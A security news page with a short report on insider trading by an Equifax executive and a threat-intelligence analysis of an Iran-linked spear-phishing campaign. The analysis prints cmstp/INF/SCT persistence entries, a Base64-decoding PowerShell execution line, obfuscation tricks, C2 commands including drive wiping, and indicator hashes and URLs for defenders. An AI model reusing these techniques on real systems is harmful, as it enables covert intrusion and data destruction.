The Radicati Group has just identified Forcepoint™ as a "Top Player" in their annual Market Quadrant Report for Advanced Persistent Threats (APTs), highlighting our industry leadership.
Feature Link
Title
Insider Trading Charges Brought Against CIO for Post-Breach Trading
On March 14, 2018, the Department of Justice and the Securities and Exchange Commission (“SEC”) announced insider trading charges against a former chief information officer (“CIO”) of a business unit of Equifax, Inc. According to prosecutors, the CIO exercised options and sold his shares after he learned of a cybersecurity breach and before that breach was publicly announced. Equifax has indicated that approximately 147.9 million consumers had personal information that was compromised.
Equifax’s board of directors had previously formed a special committee to investigate trades by certain senior executives that occurred after the breach. Although the timing of those trades drew significant scrutiny from the press, investors and others, the special committee concluded that the executives were not aware of the breach when they sold their shares. It does not appear that the special committee’s investigation covered the CIO’s trades.
According to the SEC’s complaint, the CIO—who was the leading candidate to be the company’s next global CIO—allegedly used confidential information entrusted to him in the course of his employment to conclude that Equifax had suffered a serious breach. The SEC’s investigation relied on a detailed analysis of the CIO’s emails and text messages, and also found that the CIO used a search engine to find information on the Internet concerning the September 2015 cybersecurity breach of Experian, another one of the major credit bureaus, and the impact that breach had on Experian’s stock price. The search terms used by the CIO included: (1) “Experian breach”, (2) “Experian stock price 9/15/2015”, and (3) “Experian breach 2015.”
The SEC alleges that shortly after running these internet searches, but before Equifax’s public disclosure of this data breach, the CIO exercised all of his vested Equifax stock options and then sold the underlying shares, receiving proceeds from the sale of over $950,000. According to the SEC, by selling before public disclosure of the Equifax data breach, the CIO also avoided more than $117,000 in losses that he would have suffered had he not sold until after the news of the breach became public.
This case comes on the heels of the SEC’s recently issued interpretive guidance on cybersecurity. In its guidance, the SEC warned that “information about a company’s cybersecurity risks and incidents may be material nonpublic information, and directors, officers, and other corporate insiders would violate the antifraud provisions if they trade the company’s securities in breach of their duty of trust or confidence while in possession of that material nonpublic information.”
These charges are also an important reminder to companies to (1) educate employees on insider trading laws, (2) implement appropriate internal controls and procedures to oversee trading by senior employees and employees who work in sensitive areas, (3) monitor the exercise of company-issued equity awards, and (4) promptly implement blackout periods covering appropriate personnel upon discovery of a cybersecurity incident.
AV18-043: Adobe Security Bulletins
Cisco Event Response: Microsoft Security Update Release for March 2018
Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign
Introduction
From January 2018 to March 2018, through FireEye’s Dynamic Threat Intelligence, we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East.
We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.
One of the more interesting observations during the analysis of these files was the re-use of the latest AppLocker bypass, and lateral movement techniques for the purpose of indirect code execution. The IP address in the lateral movement techniques was substituted with the local machine IP address to achieve code execution on the system.
Campaign Timeline
In this campaign, the threat actor’s tactics, techniques and procedures (TTPs) shifted after about a month, as did their targets. A brief timeline of this activity is shown in Figure 1.
Figure 1: Timeline of this recently
observed spear phishing campaign
The first part of the campaign (From Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains the Base64 encoded PowerShell command, which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe. The process chain is shown in Figure 2.
Figure 2: Process chain for the first
part of the campaign
Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of process tree, its final purpose remained same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it. One such example of the VBS invoking PowerShell via MSHTA is shown in Figure 3.
Figure 3: VBS invoking PowerShell via MSHTA
The second part of the campaign (from Feb. 27, 2018, to March 5, 2018) used a new variant of the macro that does not use VBS for PowerShell code execution. Instead, it uses one of the recently disclosed code execution techniques leveraging INF and SCT files, which we will go on to explain later in the blog.
Infection Vector
We believe the infection vector for all of the attacks involved in this campaign are macro-based documents sent as an email attachment. One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4:
Figure 4: Sample spear phishing email
containing macro-based document attachment
The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India. What follows is four examples, and a complete list is available in the Indicators of Compromise section at the end of the blog.
Figure 5 shows a document purporting to be from the National Assembly of Pakistan.
Figure 5: Document purporting to be from
the National Assembly of Pakistan
A document purporting to be from the Turkish Armed Forces, with content written in the Turkish language, is shown in Figure 6.
Figure 6: Document purporting to be from
the Turkish Armed Forces
A document purporting to be from the Institute for Development and Research in Banking Technology (established by the Reserve Bank of India) is shown in Figure 7.
Figure 7: Document purporting to be from
the Institute for Development and Research in Banking Technology
Figure 8 shows a document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan.
Figure 8: Document written in Tajik that
purports to be from the Ministry of Internal Affairs of the Republic
of Tajikistan
Each of these macro-based documents used similar techniques for code execution, persistence and communication with the command and control (C2) server.
Indirect Code Execution Through INF and SCT
This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018. The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques.
The macro in the Word document drops three files in a hard coded path: C:\programdata. Since the path is hard coded, the execution will only be observed in operating systems, Windows 7 and above. The following are the three files:
- Defender.sct – The malicious JavaScript based scriptlet file.
- DefenderService.inf – The INF file that is used to invoke the above scriptlet file.
- WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script.
After dropping the three files, the macro will set the following registry key to achieve persistence:
\REGISTRY\USER\SID\Software\Microsoft\Windows\CurrentVersio
n\Run\"WindowsDefenderUpdater" = cmstp.exe /s c:\programdata\DefenderService.inf
Upon system restart, cmstp.exe will be used to execute the SCT file indirectly through the INF file. This is possible because inside the INF file we have the following section:
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,c:/programdata/Defender.sct
That section gets indirectly invoked through the DefaultInstall_SingleUser section of INF, as shown in Figure 9.
Figure 9: Indirectly invoking SCT through
the DefaultInstall_SingleUser section of INF
This method of code execution is performed in an attempt to evade security products. FireEye MVX and HX Endpoint Security technology successfully detect this code execution technique.
SCT File Analysis
The code of the Defender.sct file is an obfuscated JavaScript. The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file and execute the decoded PowerShell Script using the following command line:
powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\WindowsDefender.ini)
The rest of the malicious activities are performed by the PowerShell Script.
PowerShell File Analysis
The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools.
Some of the key obfuscation techniques used are:
- Character Replacement: Several instances of character replacement and string reversing techniques (Figure 10) make analysis difficult.
Figure 10: Character replacement and
string reversing techniques
-
PowerShell Environment Variables: Nowadays, malware authors
commonly mask critical strings such as “IEX” using environment
variables. Some of the instances used in this script are:
- $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'
- ($ENV:cOMsPEC[4,26,25]-jOin'')
- XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11.
Figure 11: PowerShell script is XOR
encoded using a single byte key
After deobfuscating the contents of the PowerShell Script, we can divide it into three sections.
Section 1
The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables:
- TEMpPAtH = "C:\ProgramData\" (the path used for storing the temp files)
- Get_vAlIdIP = https://api.ipify.org/ (used to get the public IP address of the machine)
- FIlENAmePATHP = WindowsDefender.ini (file used to store Powershell code)
- PRIVAtE = Private Key exponents
- PUbLIc = Public Key exponents
- Hklm = "HKLM:\Software\"
- Hkcu = "HKCU:\Software\"
- ValuE = "kaspersky"
- SYSID
- DrAGon_MidDLe = [array of proxy URLs]
Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12.
Figure 12: DrAGon_MidDLe stores the list
of proxy URLs used to interact with C2 server
Section 2
The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA, which leverages the public and private key exponents included in Section 1 of the PowerShell script.
Section 3
The third section of the PowerShell script is the biggest section and has a wide variety of functionalities.
During analysis, we observed a code section where a message written in Chinese and hard coded in the script will be printed in the case of an error while connecting to the C2 server:
The English translation for this message is: “Cannot connect to website, please wait for dragon”.
Other functionalities provided by this section of the PowerShell Script are as follows:
- Retrieves the following
data from the system by leveraging Windows Management
Instrumentation (WMI) queries and environment variables:
- IP Address from Network Adapter Configuration
- OS Name
- OS Architecture
- Computer Name
- Computer Domain Name
- Username
All of this data is concatenated and formatted as shown in Figure 13:
Figure 13: Concatenated and formatted
data retrieved by PowerShell script
- Register the victim’s machine to the C2 server by sending the REGISTER command to the server. In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server.
While sending to the C2 server, the data is formatted as follows:
@{SYSINFO = $get.ToString(); ACTION = "REGISTER";}
- Ability to take screenshots.
- Checks for the presence of security tools (detailed in the Appendix) and if any of these security tools are discovered, then the system will be shut down, as shown in Figure 14.
Figure 14: System shut down upon
discovery of security tools
- Ability to receive
PowerShell script from the C2 server and execute on the machine.
Several techniques are employed for executing the PowerShell
code:
- If command starts with “excel”, then it leverages
DDEInitiate Method of Excel.Appilcation to execute the
code:
- If the command starts with “outlook”, then it leverages
Outlook.Application and MSHTA to execute the code:
- If the command starts with “risk”, then execution is
performed through DCOM object:
- If command starts with “excel”, then it leverages
DDEInitiate Method of Excel.Appilcation to execute the
code:
- File upload functionality.
- Ability to disable
Microsoft Office Protected View (as shown in Figure 15) by setting
the following keys in the Windows Registry:
- DisableAttachmentsInPV
- DisableInternetFilesInPV
- DisableUnsafeLocationsInPV
Figure 15: Disabling Microsoft Office
Protected View
- Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16.
Figure 16: Reboot, shut down and clean commands
- Ability to sleep for a given number of seconds.
The following table summarizes the main C2 commands supported by this PowerShell Script.
C2 Command | Purpose |
reboot | Reboot the system using shutdown command |
shutdown | Shut down the system using shutdown command |
clean | Wipe the Drives, C:\, D:\, E:\, F:\ |
screenshot | Take a screenshot of the System |
upload | Encrypt and upload the information from the system |
excel | Leverage Excel.Application COM object for code execution |
outlook | Leverage Outlook.Application COM object for code execution |
risk | Leverage DCOM object for code execution |
Conclusion
This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence mechanism techniques, and that they can quickly leverage these techniques to update their malware. By combining multiple layers of obfuscation, they deter the process of reverse engineering and also attempt to evade security products.
Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.
Indicators of Compromise
Macro based Documents and Hashes
SHA256 Hash | Filename | Targeted Region |
eff78c23790ee834f773569b52cddb01dc3c4dd9660f5a476af044ef6fe73894 | na.doc
| Pakistan |
76e9988dad0278998861717c774227bf94112db548946ef617bfaa262cb5e338 | Invest in Turkey.doc | Turkey |
6edc067fc2301d7a972a654b3a07398d9c8cbe7bb38d1165b80ba4a13805e5ac | güvenlik yönergesi. .doc | Turkey |
009cc0f34f60467552ef79c3892c501043c972be55fe936efb30584975d45ec0 | idrbt.doc
| India |
18479a93fc2d5acd7d71d596f27a5834b2b236b44219bb08f6ca06cf760b74f6 | Türkiye Cumhuriyeti Kimlik Kartı.doc | Turkey |
3da24cd3af9a383b731ce178b03c68a813ab30f4c7c8dfbc823a32816b9406fb | Turkish Armed Forces.doc
| Turkey |
9038ba1b7991ff38b802f28c0e006d12d466a8e374d2f2a83a039aabcbe76f5c | na.gov.pk.doc
| Pakistan |
3b1d8dcbc8072b1ec10f5300c3ea9bb20db71bd8fa443d97332790b74584a115 | MVD-FORM-1800.doc |
Tajikistan |
cee801b7a901eb69cd166325ed3770daffcd9edd8113a961a94c8b9ddf318c88 | KEGM-CyberAttack.doc | Turkey |
1ee9649a2f9b2c8e0df318519e2f8b4641fd790a118445d7a0c0b3c02b1ba942 | IL-1801.doc | Turkey |
aa60c1fae6a0ef3b9863f710e46f0a7407cf0feffa240b9a4661a4e8884ac627 | kiyiemniyeti.doc |
Turkey |
93745a6605a77f149471b41bd9027390c91373558f62058a7333eb72a26faf84 | TCELL-S1-M.doc | Tajikistan |
c87799cce6d65158da97aa31a5160a0a6b6dd5a89dea312604cc66ed5e976cc9 | egm-1.doc | Turkey |
2cea0b740f338c513a6390e7951ff3371f44c7c928abf14675b49358a03a5d13 | Connectel .pk.doc |
Pakistan |
18cf5795c2208d330bd297c18445a9e25238dd7f28a1a6ef55e2a9239f5748cd | gßvenlik_yÜnergesi_.doc | Turkey |
153117aa54492ca955b540ac0a8c21c1be98e9f7dd8636a36d73581ec1ddcf58 | MIT.doc | Turkey |
d07d4e71927cab4f251bcc216f560674c5fb783add9c9f956d3fc457153be025 | Gvenlik Ynergesi.doc | Turkey |
af5f102f0597db9f5e98068724e31d68b8f7c23baeea536790c50db587421102 | Gvenlik Ynergesi.doc | Turkey |
5550615affe077ddf66954edf132824e4f1fe16b3228e087942b0cad0721a6af | NA | Turkey |
3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c | Anadolu Güneydoğu Projesinde .doc | Turkey |
Network Indicators
List of Proxy URLs
hxxp://alessandrofoglino[.]com//db_template.php
hxxp://www.easy-home-sales[.]co.za//db_template.php
hxxp://www.almaarefut[.]com/admin/db_template.php
hxxp://chinamall[.]co.za//db_template.php
hxxp://amesoulcoaching[.]com//db_template.php
hxxp://www.antigonisworld[.]com/wp-includes/db_template.php
hxxps://anbinni.ba/wp-admin/db_template.php
hxxp://arctistrade[.]de/wp/db_template.php
hxxp://aianalytics[.]ie//db_template.php
hxxp://www.gilforsenate[.]com//db_template.php
hxxp://mgamule[.]co.za/oldweb/db_template.php
hxxp://chrisdejager-attorneys[.]co.za//db_template.php
hxxp://alfredocifuentes[.]com//db_template.php
hxxp://alxcorp[.]com//db_template.php
hxxps://www.aircafe24[.]com//db_template.php
hxxp://agencereferencement.be/wp-admin/db_template.php
hxxp://americanlegacies[.]org/webthed_ftw/db_template.php
hxxps://aloefly[.]net//db_template.php
hxxp://www.duotonedigital[.]co.za//db_template.php
hxxp://architectsinc[.]net//db_template.php
hxxp://www.tanati[.]co.za//db_template.php
hxxp://emware[.]co.za//db_template.php
hxxp://breastfeedingbra[.]co.za//db_template.php
hxxp://alhidayahfoundation[.]co[.]uk/category/db_template.php
hxxp://cashforyousa[.]co.za//db_template.php
hxxps://www.airporttaxi-uk[.]co[.]uk/wp-includes/db_template.php
hxxp://antjetaubert[.]de//db_template.php
hxxp://hesterwebber[.]co.za//db_template.php
hxxp://fickstarelectrical[.]co.za//db_template.php
hxxp://alex-frost[.]com/assets/db_template.php
hxxps://americanbrasil[.]com.br//db_template.php
hxxps://aileeshop[.]com//db_template.php
hxxps://annodle[.]com//db_template.php
hxxp://goldeninstitute[.]co.za/contents/db_template.php
hxxp://ednpk[.]com//db_template.php
hxxp://www.arabiccasinochoice[.]com//db_template.php
hxxp://proeventsports[.]co.za//db_template.php
hxxp://glenbridge[.]co.za//db_template.php
hxxp://berped[.]co.za//db_template.php
hxxp://best-digital-slr-cameras[.]com//db_template.php
hxxp://antonhirvonen[.]com/pengalandet.se/wp-includes/db_template.php
hxxp://www.alpacal[.]com//db_template.php
hxxps://www.alakml[.]com/wp-admin/db_template.php
hxxp://ar-rihla[.]com//db_template.php
hxxp://appsvoice[.]info//db_template.php
hxxp://www.bashancorp[.]co.za//db_template.php
hxxp://alexanderbecker[.]net/services/db_template.php
hxxp://visionclinic.co.ls/visionclinic/db_template.php
hxxps://www.angelesrevista[.]com//db_template.php
hxxps://www.antojoentucocina[.]com//db_template.php
hxxp://apollonweb[.]com//db_template.php
hxxps://www.alphapixa[.]com//db_template.php
hxxp://capitalradiopetition[.]co.za//db_template.php
hxxp://www.generictoners[.]co.za//db_template.php
hxxps://alnahdatraining[.]com//db_template.php
hxxps://albousala[.]com//db_template.php
hxxps://www.dopetroleum[.]com//db_template.php
hxxp://bios-chip[.]co.za//db_template.php
hxxp://www.crissamconsulting[.]co.za//db_template.php
hxxp://capriflower[.]co.za//db_template.php
hxxp://www.dingaanassociates[.]co.za//db_template.php
hxxp://indiba-africa[.]co.za//db_template.php
hxxp://verifiedseller[.]co.za/js/db_template.php
hxxps://www.buraqlubricant[.]com//db_template.php
hxxp://aqarco[.]com/wp-admin/db_template.php
hxxp://allaboutblockchain[.]net//db_template.php
hxxp://www.amexcars[.]info/tpl/db_template.php
hxxp://clandecor[.]co.za/rvsUtf8Backup/db_template.php
hxxp://bakron[.]co.za//db_template.php
hxxp://gsnconsulting[.]co.za//db_template.php
hxxp://vumavaluations[.]co.za//db_template.php
hxxp://heritagetravelmw[.]com//db_template.php
hxxp://ampvita[.]com//db_template.php
hxxp://ahero-resource-center[.]org/administrator/db_template.php
hxxps://arbulario[.]com//db_template.php
hxxp://havilahglo[.]co.za/wpscripts/db_template.php
hxxp://www.bestdecorativemirrors[.]com/More-Mirrors/db_template.php
hxxp://delectronics[.]com[.]pk//db_template.php
hxxp://antucomp[.]com//db_template.php
hxxp://advocatetn[.]com/font-awesome/fonts/db_template.php
hxxps://amooy[.]com/webservice/db_template.php
hxxp://www.harmonyguesthouse[.]co.za//db_template.php
hxxp://alanrori[.]com//db_template.php
hxxp://algarvesup[.]com//db_template.php
hxxp://desirablehair[.]co.za//db_template.php
hxxp://comsip[.]org.mw//db_template.php
hxxp://jdcorporate[.]co.za/catalog/db_template.php
hxxp://andrewfinnburhoe[.]com//db_template.php
hxxp://anyeva[.]com/wp-includes/db_template.php
hxxp://www.agenceuhd[.]com//db_template.php
hxxp://host4unix[.]net/host24new/db_template.php
hxxp://www.altaica[.]ca/wordpress/db_template.php
hxxp://www.allbuyer[.]co[.]uk//db_template.php
hxxp://jvpsfunerals[.]co.za//db_template.php
hxxp://immaculatepainters[.]co.za//db_template.php
hxxp://tcpbereka[.]co.za/js/db_template.php
hxxp://clientcare.co.ls//db_template.php
hxxp://investaholdings[.]co.za/htc/db_template.php
hxxp://www.amjobs[.]co[.]uk//db_template.php
hxxp://www.agirlgonewine[.]com/store/db_template.php
hxxp://findinfo-more[.]com//db_template.php
hxxp://asgen[.]org//db_template.php
hxxp://alphasalesrecruitment[.]com//db_template.php
hxxp://irshadfoundation[.]co.za//db_template.php
hxxp://analternatif[.]com/includes/db_template.php
hxxp://arbruisseau[.]com/profiles/db_template.php
hxxp://ladiescircle[.]co.za//db_template.php
hxxp://all-reseller[.]com/zzz_backup/db_template.php
hxxp://alcatrazmoon[.]com/images/db_template.php
hxxp://www.alcalumni[.]com/wp-includes/db_template.php
hxxp://aniljoseph[.]com/servermon/db_template.php
hxxp://alwake3press[.]com/wp-includes/db_template.php
hxxp://www.hfhl[.]org.ls/habitat/db_template.php
hxxp://alcafricanos[.]com/slsmonographs/db_template.php
hxxps://agapeencounter[.]org//db_template.php
hxxp://apobiomedix[.]ca//db_template.php
hxxp://anythinglah[.]info//db_template.php
hxxp://aniroleplay[.]net//db_template.php
hxxp://www.allcopytoners[.]com//db_template.php
hxxp://alphaobring[.]com//db_template.php
hxxp://www.galwayprimary[.]co.za//db_template.php
hxxp://alnuzha[.]org/en/db_template.php
hxxps://ancient-wisdoms[.]com//db_template.php
hxxp://amazingenergysavings[.]net//db_template.php
hxxp://gvs[.]com[.]pk/font-awesome/db_template.php
hxxp://geetransfers[.]co.za/font-awesome/db_template.php
hxxp://carlagrobler[.]co.za/components/db_template.php
hxxp://amazingashwini[.]com//db_template.php
hxxp://aminearserver[.]es//db_template.php
hxxp://lensofafrica[.]co.za//db_template.php
hxxp://greenacrestf[.]co.za/video/db_template.php
hxxp://www.tonaro[.]co.za//db_template.php
hxxp://alephit2[.]biz/kitzz/db_template.php
hxxp://lppaportal[.]org.ls//db_template.php
hxxp://alkousy[.]com//db_template.php
hxxp://ambulatorioveterinariocalusco[.]com/img/common/db_template.php
hxxp://fragranceoil[.]co.za//db_template.php
hxxp://www.eloquent[.]co.za/nweb2/db_template.php
hxxp://chrishanicdc[.]org/wpimages/db_template.php
hxxp://ahc.me[.]uk//db_template.php
hxxp://www.britishasia-equip[.]co[.]uk//db_template.php
hxxp://always-beauty[.]ch//db_template.php
hxxps://www.ancamamara[.]com/wp-admin/db_template.php
hxxp://entracorntrading[.]co.za//db_template.php
hxxp://www.alexjeffersonconsulting[.]com/wp-includes/db_template.php
hxxp://americabr[.]com.br//db_template.php
hxxp://andrew-snyder[.]net/bootstrap/db_template.php
hxxp://signsoftime[.]co.za//db_template.php
hxxp://aperta-armis[.]org//db_template.php
hxxp://absfinancialplanning[.]co.za/images/db_template.php
hxxp://charispaarl[.]co.za//db_template.php
hxxp://indlovusecurity[.]co.za//db_template.php
hxxp://alcafricandatalab[.]com//db_template.php
hxxp://amor-clubhotels[.]com//db_template.php
hxxp://mokorotlocorporate[.]com//db_template.php
hxxp://apppriori[.]com//db_template.php
hxxp://luxconprojects[.]co.za//db_template.php
hxxp://androidphonetips[.]com/wp-includes/db_template.php
hxxp://angel-seeds[.]com.ua/catalog/db_template.php
hxxp://alissanicolai[.]com/assets/db_template.php
hxxps://www.amateurastronomy[.]org//db_template.php
hxxp://aiofotoevideo[.]com//db_template.php
hxxp://www.amika.hr//db_template.php
hxxp://comfortex[.]co.za/php/db_template.php
hxxp://deepgraphics[.]co.za//db_template.php
hxxps://agiledepot[.]com//db_template.php
hxxp://almatours[.]gr//db_template.php
hxxp://analystcnwang[.]com//db_template.php
hxxp://www.malboer[.]co.za/trendy1/db_template.php
hxxp://sefikengfarm.co.ls//db_template.php
hxxp://www.antirughenaturale[.]com/wp-admin/db_template.php
hxxp://passright[.]co.za//db_template.php
hxxp://seismicfactory[.]co.za//db_template.php
hxxp://alessandroalessandrini[.]it//db_template.php
hxxps://aquabsafe[.]com//db_template.php
hxxp://amatikulutours[.]com/tmp/db_template.php
hxxp://ganitis[.]gr//db_template.php
hxxp://aleenasgiftbox[.]com/admin/db_template.php
hxxps://allusdoctors[.]com/themes/db_template.php
hxxp://alainsaffel[.]com//db_template.php
hxxp://www.ariehandomri[.]com//db_template.php
hxxp://aquaneeka[.]co[.]uk/wp-includes/db_template.php
hxxp://itengineering[.]co.za/gatewaydiamond/db_template.php
hxxp://alldomains-crm[.]com/bubblegumpopcorn[.]com/wp-admin/db_template.php
hxxp://www.albertamechanical[.]ca//db_template.php
hxxp://alchamel[.]info//db_template.php
hxxps://almokan[.]net/wp-includes/db_template.php
hxxp://jakobieducation[.]co.za//db_template.php
hxxps://arc-sec[.]net//db_template.php
hxxp://ldams[.]org.ls/supplies/db_template.php
hxxp://menaboracks[.]co.za/tmp/db_template.php
hxxp://www.getcord[.]co.za//db_template.php
hxxp://boardaffairs[.]com//db_template.php
hxxp://capetownway[.]co.za//db_template.php
hxxp://cloudhostdesign[.]com//db_template.php
hxxp://hartenboswaterpark[.]co.za/templates/db_template.php
hxxp://fccorp[.]co.za/php/db_template.php
hxxp://angar68[.]com//db_template.php
hxxp://www.dws-gov[.]co.za//db_template.php
hxxp://alwahahweb[.]com//db_template.php
hxxp://anuragcreatives[.]com//db_template.php
hxxp://embali[.]co.za//db_template.php
hxxp://albertaedmonton[.]com/widgetstyles/db_template.php
hxxp://altosdefontana[.]com//db_template.php
hxxp://airfanhydro[.]net//db_template.php
hxxps://www.alexponcet[.]com/wp-includes/db_template.php
hxxp://agropecuariavilarica[.]com.br//db_template.php
hxxps://www.amazingbuyrd[.]com/admin/db_template.php
hxxp://cdxtrading[.]co.za//db_template.php
hxxp://interafricaconsulting[.]com/wpimages/db_template.php
hxxp://glgroup[.]co.za/images/db_template.php
hxxp://hisandherskennels[.]co.za/php/db_template.php
hxxp://alemaohost[.]com/lotosorg[.]com/db_template.php
hxxp://isibaniedu[.]co.za/admin/db_template.php
hxxp://dianakleyn[.]co.za/layouts/db_template.php
hxxp://themotoringcalendar[.]co.za//db_template.php
hxxp://www.loansonhomes[.]co.za//db_template.php
hxxp://edgesecurity[.]co.za/js/db_template.php
hxxp://highschoolsuperstar[.]co.za/files/db_template.php
hxxp://www.ambientproperty[.]com//db_template.php
hxxp://animationshowreel[.]co.il//db_template.php
hxxp://cafawelding[.]co.za/font-awesome/db_template.php
hxxp://apalawyers.pt//db_template.php
hxxp://www.edesignz[.]co.za//db_template.php
hxxp://centuryacademy[.]co.za/css/db_template.php
hxxps://ambyenta.hr//db_template.php
hxxp://ceramica[.]co.za//db_template.php
hxxp://www.alfredoposada[.]com//db_template.php
hxxp://anastasovsworkshop[.]com/wp-includes/db_template.php
hxxp://allisonplumbing[.]com/wp-includes/db_template.php
hxxp://eastrandmotorlab[.]co.za/fleet/db_template.php
hxxp://angelsongroup[.]com/wp-includes/db_template.php
hxxp://www.mikimaths[.]com//db_template.php
hxxp://hjb-racing[.]co.za/htdocs/db_template.php
hxxp://anotherpartofme[.]com/wp-includes/db_template.php
hxxp://www.andreabelfi[.]com//db_template.php
hxxp://www.iancullen[.]co.za//db_template.php
hxxp://alaskamaterials[.]com//db_template.php
hxxp://jeanetteproperties[.]co.za//db_template.php
hxxp://www.digitalmedia[.]co.za//db_template.php
hxxp://www.rejoicetheatre[.]com//db_template.php
hxxps://alterwebhost[.]com//db_template.php
hxxp://bc-u[.]co[.]uk//db_template.php
hxxp://dpscdgkhan.edu[.]pk/shopping/db_template.php
hxxp://edgeforensic[.]co.za//db_template.php
hxxp://willpowerpos[.]co.za//db_template.php
hxxp://antrismode[.]com/wp-includes/db_template.php
hxxp://colenesphotography[.]co.za/modules/db_template.php
hxxp://anthaigroup.vn//db_template.php
hxxps://alphainvestors[.]com.au//db_template.php
hxxps://aliart[.]nl//db_template.php
hxxps://allmantravel[.]com/thumbs/db_template.php
hxxp://fbrvolume[.]co.za//db_template.php
hxxp://amordegato[.]es/storefront/db_template.php
hxxp://agylub[.]com//db_template.php
hxxp://www.khotsonglodge.co.ls//db_template.php
hxxp://ampli5yd[.]com//db_template.php
hxxps://animeok[.]co.il//db_template.php
hxxps://arbeidsrechtcentrum[.]nl//db_template.php
hxxp://erniecommunications[.]co.za/js/db_template.php
hxxp://promechtransport[.]co.za/scripts/db_template.php
hxxp://centuriongsd[.]co.za//db_template.php
hxxp://www.agencesylvieleclerc[.]com//db_template.php
hxxp://delcom[.]co.za//db_template.php
hxxps://aleoestudio[.]com/gallonature/db_template.php
hxxp://oftheearthphotography[.]com/www/db_template.php
hxxp://h-dubepromotions[.]co.za//db_template.php
hxxp://www.alessioborzuola[.]com/downloads/db_template.php
hxxp://crystaltidings[.]co.za//db_template.php
hxxp://funeralbusinesssolution[.]com/email_template/db_template.php
hxxp://funisalodge[.]co.za/data1/db_template.php
hxxp://experttutors[.]co.za//db_template.php
hxxps://www[.]cartridgecave[.]co.za//db_template.php
hxxp://ecs-consult[.]com//db_template.php
hxxp://www.animationinisrael[.]org/tmp_images/db_template.php
hxxp://gideonitesprojects[.]com//db_template.php
hxxp://hybridauto[.]co.za/photography/db_template.php
hxxp://africanpixels.zar.cc//db_template.php
hxxp://ryanchristiefurniture[.]co.za//db_template.php
hxxp://evansmokaba[.]com/evansmokaba[.]com/thabiso/db_template.php
hxxp://almeriahotelja[.]com/dk/db_template.php
hxxp://al3abflash[.]biz//db_template.php
hxxp://www.fun4kidz[.]co.za//db_template.php
hxxp://alsharhanstore[.]com//db_template.php
hxxp://www[.]infratechconsulting[.]com//db_template.php
hxxp://algihad[.]com/assets/db_template.php
hxxp://americanwestmedia[.]com//db_template.php
hxxp://charliewestsecurity[.]co.za//db_template.php
hxxp://beehiveholdingszar[.]co.za//db_template.php
hxxp://analyticalfootball[.]com//db_template.php
hxxp://apiiination[.]com/leadership/db_template.php
hxxps://ahelicoptermom[.]com/wp-includes/db_template.php
hxxp://servicebox[.]co.za//db_template.php
hxxp://globalelectricalandconstruction[.]co.za/wpscripts/db_template.php
hxxps://aquo[.]in//db_template.php
hxxps://www.alfransia[.]com/wp-admin/db_template.php
hxxp://www.icsswaziland[.]com//db_template.php
hxxp://aiko.pro//db_template.php
hxxps://alceharfield[.]com//db_template.php
hxxp://indocraft[.]co.za/test/db_template.php
hxxp://allegiancesecurity[.]org//db_template.php
hxxp://sullivanprimary[.]co.za//db_template.php
hxxp://www.apmequestrian[.]com//db_template.php
hxxps://alphawaves[.]org/wp-admin/db_template.php
hxxp://www.alexandrasternin[.]com/illustration/db_template.php
hxxp://www.daleth[.]co.za//db_template.php
hxxp://jwseshowe[.]co.za/assets/db_template.php
hxxp://winagainstebola[.]com//db_template.php
hxxp://anubandh[.]in//db_template.php
hxxp://www.alexanderhomestead[.]com//db_template.php
hxxp://alfatek-intelligence[.]com//db_template.php
hxxp://www.aprendiendoencasa[.]com/wp-includes/db_template.php
hxxp://alorabrownies[.]com/wp-admin/db_template.php
hxxp://andrasadam[.]com/tothildiko/wp-includes/db_template.php
hxxp://cazochem[.]co.za/cazochem/db_template.php
hxxp://debnoch[.]com/image/db_template.php
hxxp://hmholdings360[.]co.za//db_template.php
hxxp://iinvest4u[.]co.za//db_template.php
hxxp://burgercoetzeeattorneys[.]co.za//db_template.php
hxxp://anngrigphoto[.]com//db_template.php
hxxp://alchemistasonida[.]com//db_template.php
hxxp://anahera[.]biz/admin/db_template.php
hxxp://h-u-i[.]co.za/heiren/db_template.php
hxxp://insta-art[.]co.za//db_template.php
hxxp://muallematsela[.]com//db_template.php
